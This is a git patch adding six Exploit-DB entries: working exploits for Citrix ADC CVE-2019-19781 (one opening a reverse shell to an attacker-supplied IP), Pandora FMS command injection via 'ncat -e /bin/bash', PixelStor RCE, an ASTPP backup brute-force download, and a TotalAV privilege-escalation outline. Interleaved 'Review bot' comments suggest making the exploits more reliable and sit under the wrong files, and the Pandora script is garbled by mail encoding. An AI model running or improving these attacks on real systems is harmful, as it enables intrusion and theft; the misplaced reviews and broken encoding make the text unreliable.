From d3ca8599713572b6fe9d2736aafddd9b6741b065 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 11 Jan 2020 05:02:00 +0000
Subject: [PATCH] DB: 2020-01-11
6 changes to exploits/shellcodes
TotalAV 2020 4.14.31 - Privilege Escalation
Pandora 7.0NG - Remote Code Execution
PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution
ASTPP 4.0.1 VoIP Billing - Database Backup Download
Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)
Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution
---
 exploits/linux/webapps/47900.txt | 56 ++++++++++++
 exploits/multiple/webapps/47901.sh | 23 +++++
 exploits/multiple/webapps/47902.py | 132 +++++++++++++++++++++++++++++
 exploits/php/webapps/47898.py | 71 ++++++++++++++++
 exploits/php/webapps/47899.py | 35 ++++++++
 exploits/windows/local/47897.txt | 35 ++++++++
 files_exploits.csv | 6 ++
 7 files changed, 358 insertions(+)
 create mode 100644 exploits/linux/webapps/47900.txt
 create mode 100755 exploits/multiple/webapps/47901.sh
 create mode 100755 exploits/multiple/webapps/47902.py
 create mode 100755 exploits/php/webapps/47898.py
 create mode 100755 exploits/php/webapps/47899.py
 create mode 100644 exploits/windows/local/47897.txt
diff --git a/exploits/linux/webapps/47900.txt b/exploits/linux/webapps/47900.txt
new file mode 100644
index 000000000..7f1fec921
--- /dev/null
+++ b/exploits/linux/webapps/47900.txt
@@ -0,0 +1,56 @@
+# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download
+# Date: 2019-11-18
+# Exploit Author: Fabien AUNAY
+# Vendor Homepage: https://www.astppbilling.org/
+# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
+# Version: 4.0.1 vendor default setup script
+# Tested on: Debian 9 - CentOS 7
+# CVE : -
+
+###########################################################################################################
+ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download
+
+A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
+It is available as an open source solution. It means without any investment, one can start his telephony
+business using ASTPP.
+ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
+comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
+solution to “A Smart TelePhony Platform”.
+The latest version of ASTPP is provisioned with some advanced functional modules which are designed
+to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
+4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
+Technology.
+
+When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create)
+the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/.
+
+The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz
+
+Pattern review:
+- astpp_
+- year
+- month
+- day
+- 6 PIN digit
+
+Steps:
+Objective 1 : Generate your 6 PIN list
+Objective 2 : FUZZ the target URL
+Objective 3 : Download the mysqldump
+
+###########################################################################################################
+
+Objective 1: Generate your 6 PIN list
+POC: crunch 6 6 0123456789 > pin_fuzzer.list
+
+Objective 2 : FUZZ the target URL
+POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz'
+===================================================================
+ID Response Lines Word Chars Payload
+===================================================================
+
+000080137: 200 1135 L 6859 W 550239 Ch "080136"
+
+Objective 3 : Download the mysqldump
+POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz
+astpp_20200110080136.sql.gz 100%[===============================================================================>] 296,70K 1,05MB/s ds 0,3
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47901.sh b/exploits/multiple/webapps/47901.sh
new file mode 100755
index 000000000..f9e4d7557
--- /dev/null
+++ b/exploits/multiple/webapps/47901.sh
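Review bot: The six-digit suffix that the `wfuzz` step brute-forces looks like the HHMMSS of the backup's creation time rather than a random PIN (the sample `astpp_20200110080136.sql.gz` reads as 2020-01-10 08:01:36), in which case `crunch 6 6 0123456789` over-generates by roughly 12x and a list of the 86,400 valid `HHMMSS` values would finish the fuzz much sooner; this reading is inferred from the sample and should be confirmed against the backup routine before the advisory states it. The date part is hard-coded as `20200110` in the fuzz URL, so the write-up should say that the backup day also has to be known or iterated. The on-disk location is given as `/var/www/html/astpp/database_backup/` while both PoC URLs request `/database_backup/` with no `/astpp/` segment; naming the document root used in the test would remove that ambiguity for readers reproducing it. A one-line mitigation note (keep backups outside the web root or deny the directory in the vhost) would also be worth adding, since the dump is otherwise downloadable by anyone who can guess the name.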
@@ -0,0 +1,23 @@
+#!/bin/bash
+# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
+# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
+# Release Date : 11/01/2020
+# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
+echo "=================================================================================
+ ___ _ _ ____ ___ _ _
+| _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _
+| _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' |
+|_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_|
+ |__/ CVE-2019-19781
+================================================================================="
+##############################
+if [ -z "$1" ];
+then
+echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
+exit;
+fi
+filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
+curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
+echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
+echo -ne "Command Output :\n"
+curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47902.py b/exploits/multiple/webapps/47902.py
new file mode 100755
index 000000000..a9c4d655b
--- /dev/null
+++ b/exploits/multiple/webapps/47902.py
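Review bot: `$2` is spliced unescaped into a Perl single-quoted string inside the Template Toolkit directive on the `curl -d` line, and the guard above it only checks `$1`, so running the script without a command still fires `exec(' | tee ...')` at the target and any command containing `'` silently breaks the template; tighten the guard to `if [ -z "$1" ] || [ -z "$2" ]; then` and state the quoting limitation in the usage comment. The payload also leaves the command output on the appliance as `/netscaler/portal/templates/$filenameid.xml` and nothing in the script removes it or even prints that path; a comment such as `# artifact left on target: /netscaler/portal/templates/$filenameid.xml — remove after use` would help both operators and incident responders. The `-s` GET issued right before `Command Output :` already prints the body, so the result appears twice; giving that first fetch `-o /dev/null` keeps its side effect while making the output unambiguous.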
@@ -0,0 +1,132 @@
+#!/usr/bin/python3
+#
+# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
+#
+# You only need a listener like netcat to catch the shell.
+#
+# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White
+#
+# Tool Written by: Rob Simon and David Kennedy
+
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
+import random
+import string
+import time
+from random import randint
+import argparse
+import sys
+
+# random string generator
+def randomString(stringLength=10):
+ letters = string.ascii_lowercase
+ return ''.join(random.choice(letters) for i in range(stringLength))
+
+# our random string for filename - will leave artifacts on system
+filename = randomString()
+randomuser = randomString()
+
+# generate random number for the nonce
+nonce = randint(5, 15)
+
+# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script
+# note that the file location will be in /netscaler/portal/templates/filename.xml
+def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):
+
+ # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)
+ encoded = ""
+ i=0
+ text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))
+ while i < len(text):
+ encoded = encoded + "chr("+str(ord(text[i]))+") . 
"
+ i += 1
+ encoded = encoded[:-3]
+ payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"
+ headers = (
+ {
+ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
+ 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
+ 'NSC_NONCE' : '%s' % (nonce),
+ })
+
+ data = (
+ {
+ "url" : "127.0.0.1",
+ "title" : payload,
+ "desc" : "desc",
+ "UI_inuse" : "a"
+ })
+
+ url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
+ requests.post(url, data=data, headers=headers, verify=False)
+
+# this is our second stage that triggers the exploit for us
+def stage2(filename, randomuser, nonce, victimip, victimport):
+ headers = (
+ {
+ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
+ 'NSC_USER' : '%s' % (randomuser),
+ 'NSC_NONCE' : '%s' % (nonce),
+ })
+
+ requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)
+
+
+# start our main code to execute
+print('''
+
+ .o oOOOOOOOo OOOo
+ Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
+ OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
+ OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
+ `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
+ .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
+ OOOOO '"OOOOOOOOOOOOOOOO"` oOO
+ oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
+ oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
+ OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
+ "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
+ Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
+ : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
+ . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
+ '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
+ `$" `OOOO' `O"Y ' `OOOO' o .
+ . . OP" : o . 
+ :
+
+Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
+Tool Written by: Rob Simon and Dave Kennedy
+Contributions: The TrustedSec Team
+Website: https://www.trustedsec.com
+INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/
+
+This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used
+to append files in an XML format to the victim machine. This in turn allows for remote code execution.
+
+Be sure to cleanup these two file locations:
+ /var/tmp/netscaler/portal/templates/
+ /netscaler/portal/templates/
+
+Usage:
+
+python citrixmash.py \n''')
+
+# parse our commands
+parser = argparse.ArgumentParser()
+parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
+parser.add_argument("targetport", help="the target server web port (normally on 443)")
+parser.add_argument("attackerip", help="the attackers reverse listener IP address")
+parser.add_argument("attackerport", help="the attackersa reverse listener port")
+args = parser.parse_args()
+print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")
+print("[*] Saving filename as %s.xml on the victim machine..." % (filename))
+# trigger our first post
+stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)
+print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")
+time.sleep(2)
+print("[*] Triggering GET request for the newly created file with a listener waiting...")
+print("[*] Shell should now be in your listener... enjoy. Keep this window open..")
+print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")
+# trigger our second post
+stage2(filename, randomuser, nonce, args.target, args.targetport)
\ No newline at end of file
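Review bot: `stage1` throws away the `requests.post` response and `stage2` does the same with `requests.get`, so a patched or mitigated appliance that answers with a non-200 is never noticed and the script still prints `Shell should now be in your listener`; capture the status, `r = requests.post(url, data=data, headers=headers, verify=False)` followed by `if r.status_code != 200: sys.exit("[-] stage1 returned HTTP %d" % r.status_code)`, which also gives the otherwise unused `sys` import a purpose. The fixed `time.sleep(2)` before `stage2` is a guess at when the template lands on disk; a short retry of the GET until it stops returning 404 would be more robust than a sleep on a slow or loaded target. A module docstring stating that the tool deliberately leaves `<filename>.xml` under both template directories (as the banner text says) would let readers find that caveat without running the script.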
diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py
new file mode 100755
index 000000000..4cd329aa0
--- /dev/null
+++ b/exploits/php/webapps/47898.py
@@ -0,0 +1,71 @@
+# Exploit Title: Pandora 7.0NG - Remote Code Execution
+# Date: 2019-11-14
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE: CVE-2019-20224
+# Vendor Homepage: https://pandorafms.org/
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Version: v7.0NG
+# Tested on: CentOS 7.3 / PHP 5.4.16
+
+#!/usr/bin/python3
+
+import requests
+import sys
+
+if len(sys.argv) !=3D 6:
+ print("[+] Usage : ./exploit.py target username password ip port")
+ exit()
+
+target =3D sys.argv[1]
+username =3D sys.argv[2]
+password =3D sys.argv[3]
+ip =3D sys.argv[4]
+port =3D int(sys.argv[5])
+
+request =3D requests.session()
+
+login_info =3D {
+ "nick": username,
+ "pass": password,
+ "login_button": "Login"
+}
+
+login_request =3D request.post(
+ target+"/pandora_console/index.php?login=3D1",
+ login_info,
+ verify=3DFalse,
+ allow_redirects=3DTrue
+ )
+
+resp =3D login_request.text
+
+if "User not found in database" in resp:
+ print("[-] Login Failed")
+ exit()
+else:
+ print("[+] Logged In Successfully")
+
+print("[+] Sending crafted graph request ..")
+
+body_request =3D {
+ "date": "0",
+ "time": "0",
+ "period": "0",
+ "interval_length": "0",
+ "chart_type": "netflow_area",
+ "max_aggregates": "1",
+ "address_resolution": "0",
+ "name": "0",
+ "assign_group": "0",
+ "filter_type": "0",
+ "filter_id": "0",
+ "filter_selected": "0",
+ "ip_dst": "0",
+ "ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port),
+ "draw_button": "Draw"
+}
+
+draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
+on/netflow/nf_live_view&pure=3D0"
+print("[+] Check your netcat ;)")
+request.post(draw_url, body_request)
\ No newline at end of file
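Review bot: The file appears to have been committed with its quoted-printable mail encoding intact: every `=` in the code is `=3D` (`if len(sys.argv) !=3D 6:`, `target =3D sys.argv[1]`, `verify=3DFalse`) and the `draw_url` literal is cut by a soft line break (`...sec2=3Doperati=` / `on/netflow/...`), so as shipped the script is a SyntaxError and has to be decoded before it is usable — the 71-line hunk count suggests the split line is really in the file, not just in this rendering. Once decoded, the final `request.post(draw_url, body_request)` should also pass `verify=False` like the login request does, otherwise an HTTPS console with a self-signed certificate fails on the very request that carries the payload: `request.post(draw_url, body_request, verify=False)`. The `#!/usr/bin/python3` shebang sits on line 10 below the comment header, where the kernel never sees it; moving it to line 1 matches 47902.py in this commit. The login check keys on the `User not found in database` string, so a wrong password (different message) is reported as a successful login; checking for the console's post-login page or a session cookie instead would be more reliable.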
diff --git a/exploits/php/webapps/47899.py b/exploits/php/webapps/47899.py
new file mode 100755
index 000000000..d134556d8
--- /dev/null
+++ b/exploits/php/webapps/47899.py
@@ -0,0 +1,35 @@
+# Exploit Title: PixelStor 5000 - Remote Code Execution
+# Product: PixelStor 5000
+# Vendor: Rasilient
+# Date: 2020-01-08
+# Exploit Author: .:UND3R:.
+# Vendor Homepage: http://rasilient.com
+# Version: K:4.0.1580-20150629 (KDI Version)
+# Tested on: K:4.0.1580-20150629 (KDI Version)
+# CVE: CVE-2020-6756
+# URL Author: https://pwnedchile.com
+# Thanks: Dani Pelotocino <3, Roit
+
+import requests, sys
+
+def poc(target, cmd):
+ url = target + "/Option/languageOptions.php"
+ headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+ data = {"lang": ";" + cmd + ";/bin/echo -n en"}
+ r = requests.post(url, headers=headers, data=data)
+ if(r.status_code == 200):
+ print("\nPwned :]")
+ else:
+ print("\nNot vulnerable :(")
+
+print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3")
+
+if len(sys.argv) !=2:
+ print("\n[+] Usage: python " + sys.argv[0] + " \n")
+ sys.exit(1)
+
+if __name__ == "__main__":
+ url = sys.argv[1]
+ cmd = raw_input("\n[Linux Command]:")
+ poc(url, cmd)
+#EoF
\ No newline at end of file
diff --git a/exploits/windows/local/47897.txt b/exploits/windows/local/47897.txt
new file mode 100644
index 000000000..a189b38d9
--- /dev/null
+++ b/exploits/windows/local/47897.txt
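Review bot: `poc` prints `Pwned :]` on any HTTP 200 from `/Option/languageOptions.php`, but a 200 only shows that the endpoint answered, not that `cmd` executed, so the verdict is misleading on a patched device; since the payload is shaped so the `lang` value still resolves to `en` (`";" + cmd + ";/bin/echo -n en"`), a command with an observable side effect (a `sleep` compared against `r.elapsed`, or a callback to a listener) would be a real check, and a one-line docstring should say what a 200 does and does not prove. The script is Python 2 only (`raw_input`) yet carries no shebang or interpreter note, unlike the other scripts in this commit; `#!/usr/bin/env python2` at the top would make that explicit. The usage line prints `" \n"` after `sys.argv[0]`, so the expected argument is never shown — presumably a `<target-url>` placeholder was lost between submission and commit and should be restored.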
@@ -0,0 +1,35 @@
+# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation
+# Date: 2020-01-09
+# Exploit Author: Kusol Watchara-Apanukorn
+# Vendor Homepage: https://www.totalav.com/
+# Version: 4.14.31
+# Fixed on: 5.3.35
+# Tested on: Windows 10 x64
+# CVE : N/A
+
+# Vulnerability Description:
+# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of
+# privilege by using NTFS directory junction.
+
+**You can download vulnerability version with this link:
+https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe
+
+///////////////////////////////////
+ Proof of Concept
+//////////////////////////////////
+1. Plant the malicious file in this case we use DLL file
+2. To exploit the vulnerability antivirus must detect the malicious dll
+3. Move it to quarantine.
+4. Attacker must create NTFS directory junction to restore
+
+Full step: https://www.youtube.com/watch?v=88qeaLq98Gc
+
+
+Vulnerability Disclosure Timeline:
+==================================
+17 Oct, 19 : Found Vulnerability
+18 Oct, 19 : Vendor Notification
+18 Oct, 19 : Request CVE
+21 Oct, 19 : Vendor Response
+mid Dec, 19 : Vendor released new patched (v5.3.35)
+09 Jan, 20: Vulnerability Disclosure
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 908a6b63f..f4819a342 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
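Review bot: The four PoC steps never name the quarantine directory, the junction target, or the file that the restore writes over it, so the write-up cannot be reproduced or verified without the linked video; step 4 should state which directory is replaced by the junction, where the restored file lands, and with what privilege the restore runs, since those specifics are what a defender needs to confirm the 5.3.35 fix. The header says `CVE : N/A` while the timeline records a `Request CVE` entry on 18 Oct; noting the outcome of that request would close the loop. The `**You can download...` line reads as markdown emphasis that was never closed and should be plain text in a `.txt` advisory.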
@@ -10887,6 +10887,7 @@ id,file,description,date,author,type,platform,port
 47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
 47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
 47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
+47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42197,3 +42198,8 @@ id,file,description,date,author,type,platform,port
 47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java,
 47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
 47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
+47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
+47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
+47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
+47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
+47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,